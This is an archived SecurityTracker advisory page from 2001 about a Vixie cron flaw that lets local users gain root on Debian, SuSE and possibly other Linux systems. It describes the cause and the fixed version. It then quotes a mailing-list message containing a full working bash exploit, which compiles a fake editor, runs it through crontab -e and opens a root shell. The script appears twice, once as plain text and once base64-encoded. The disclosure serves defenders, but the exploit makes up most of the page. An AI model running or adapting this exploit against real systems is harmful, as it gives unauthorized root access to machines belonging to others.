SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Cron Vendors:   Vixie, Paul
(Information on Affected OS Platforms) Re: Cron Utility Allows Local Users to Obtain Root-Level Privileges
SecurityTracker Alert ID:  1001495
SecurityTracker URL:  http://securitytracker.com/id/1001495
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 8 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): prior to 3.0pl1-57.3
Description:   A vulnerability was reported in the Vixie cron utility that allows local users to obtain root-level privileges on the host.

It is reported that a recent (fall 2000) security fix to cron introduced this vulnerability. The utility apparently does not properly release privileges before invoking the editor, allowing a local user to execute commands on the host with root-level privileges.

A user indicates that this vulnerability affects "Debian, SuSE, and probably few other Linuxes as well."

A demonstration exploit is attached (see the Source Message). However, the user indicates that the vulnerability can be readily exploited by hand, without any scripting necessary.

Impact:   A local user can execute commands on the host with root-level privileges, thereby obtaining root level access to the host.
Solution:   This has been fixed in version 3.0pl1-57.3 (or 3.0pl1-67 for unstable). See the Debian Security Advisory in the Source Message for more details.
Vendor URL:  www.debian.org/security/ (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any)
Underlying OS Comments:  This may only affect Debian, but that has not yet been confirmed

Message History:   This archive entry is a follow-up to the message listed below.
May 8 2001 Cron Utility Allows Local Users to Obtain Root-Level Privileges



 Source Message Contents

Subject:  Re: Vixie cron vulnerability


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, there is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx


-- SecurityTracker has decoded the MIME attachment for your convenience --

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else { 
    dup2(1,0); 
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n"); 
    system("touch $HOME/.xploited");
    system("bash"); 
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi





---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=corntab
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0105081130550.8683@nimue.bos.bindview.com>
Content-Description:
Content-Disposition: attachment; filename=corntab

IyEvYmluL2Jhc2gNCg0KY2xlYXINCmVjaG8gIi4tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS4i
DQplY2hvICJ8IE1hcmNoZXcuSHlwZXJyZWFsIHByZXNlbnRzOiB2aXhpZSBj
cm9udGFiIGV4cGxvaXQgIzcyODM3MSB8Ig0KZWNobyAifD09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09fCINCmVjaG8gInwgU2ViYXN0aWFuIEtyYWhtZXIgPGtyYWhtZXJAc2Vj
dXJpdHkuaXM+ICAgICAgICAgICAgICAgICAgIHwiDQplY2hvICJ8IE1pY2hh
bCBaYWxld3NraSA8bGNhbXR1ZkBjb3JlZHVtcC5jeD4gICAgICAgICAgICAg
ICAgICAgICB8Ig0KZWNobyAiXGAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSciDQplY2hvDQoN
CnRlc3QgIiRDUk9OQklOIiA9ICIiICYmIENST05CSU49L3Vzci9iaW4vY3Jv
bnRhYg0KDQplY2hvICAgICI+Pj4gVXNpbmcgYmluYXJ5OiAgJENST05CSU4i
DQplY2hvIC1uICI+Pj4gU2V0dWlkIGNoZWNrOiAgIg0KDQppZiBbIC11ICRD
Uk9OQklOIF07IHRoZW4NCiAgZWNobyAiUEFTU0VEIg0KZWxzZQ0KICBlY2hv
ICJGQUlMRUQiDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQplY2hvIC1uICI+
Pj4gVmVyc2lvbiBjaGVjazogIg0KDQpRUT1gc3RyaW5ncyAkQ1JPTkJJTiB8
IGdyZXAgJzQzIHZpeGllIEV4cCdgDQoNCmlmIFsgIiRRUSIgPSAiIiBdOyB0
aGVuDQogIGVjaG8gIkZBSUxFRCINCiAgZWNobw0KICBleGl0IDENCmVsc2UN
CiAgZWNobyAiUEFTU0VEIg0KZmkNCg0KZWNobyAiPj4+IEJ1aWxkaW5nIGV4
cGxvaXQuLi4iDQoNCmNhdCA+ZWRpdDByLmMgPDxfZW9mXw0KI2luY2x1ZGUg
PHN0ZGlvLmg+DQppbnQgbWFpbihpbnQgYXJnYyxjaGFyKiBhcmd2W10pIHsN
CiAgc2xlZXAoMSk7DQogIGlmIChnZXRldWlkKCkpIHsNCiAgICBGSUxFKiB4
PWZvcGVuKGFyZ3ZbMV0sInciKTsNCiAgICBmcHJpbnRmKHgsImJsYWggYmxh
aCBibGFoXG4iKTsNCiAgICBmY2xvc2UoeCk7DQogIH0gZWxzZSB7IA0KICAg
IGR1cDIoMSwwKTsgDQogICAgZHVwMigxLDIpOw0KICAgIHByaW50ZigiXG4+
Pj4gRW50ZXJpbmcgcm9vdHNoZWxsLCBiYWJlLi4uXG4iKTsgDQogICAgc3lz
dGVtKCJ0b3VjaCAkSE9NRS8ueHBsb2l0ZWQiKTsNCiAgICBzeXN0ZW0oImJh
c2giKTsgDQogIH0NCn0NCl9lb2ZfDQoNCmdjYyBlZGl0MHIuYyAtbyBlZGl0
MHIgJj4vZGV2L251bGwNCnJtIC1mIGVkaXQwci5jDQoNCmlmIFsgISAtZiBl
ZGl0MHIgXTsgdGhlbg0KICBlY2hvICI+Pj4gQ2Fubm90IGNvbXBpbGUgZXhw
bG9pdC4iDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQpybSAtZiB+Ly54cGxv
aXRlZA0KDQplY2hvICI+Pj4gUGVyZm9ybWluZyBhdHRhY2suLi4iDQoNCigg
ZWNobyAieSI7IGVjaG8gIm4iICkgfCBWSVNVQUw9JFBXRC9lZGl0MHIgJENS
T05CSU4gLWUgMj4vZGV2L251bGwNCg0Kcm0gLWYgZWRpdDByDQoNCmlmIFsg
LWYgfi8ueHBsb2l0ZWQgXTsgdGhlbg0KICBlY2hvDQogIGVjaG8gIj4+PiBU
aGFuayB5b3UuIg0KICBybSAtZiB+Ly54cGxvaXRlZA0KICBlY2hvDQogIGV4
aXQgMA0KZWxzZQ0KICBlY2hvDQogIGVjaG8gIj4+PiBBcHBhcmVudGx5IEkg
YW0gbm90IGFibGUgdG8gZXhwbG9pdCBpdCwgc29ycnkuLi4iDQogIGVjaG8N
CiAgZXhpdCAxDQpmaQ0KDQoNCg==
---373265275-503631084-989335855=:8683--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC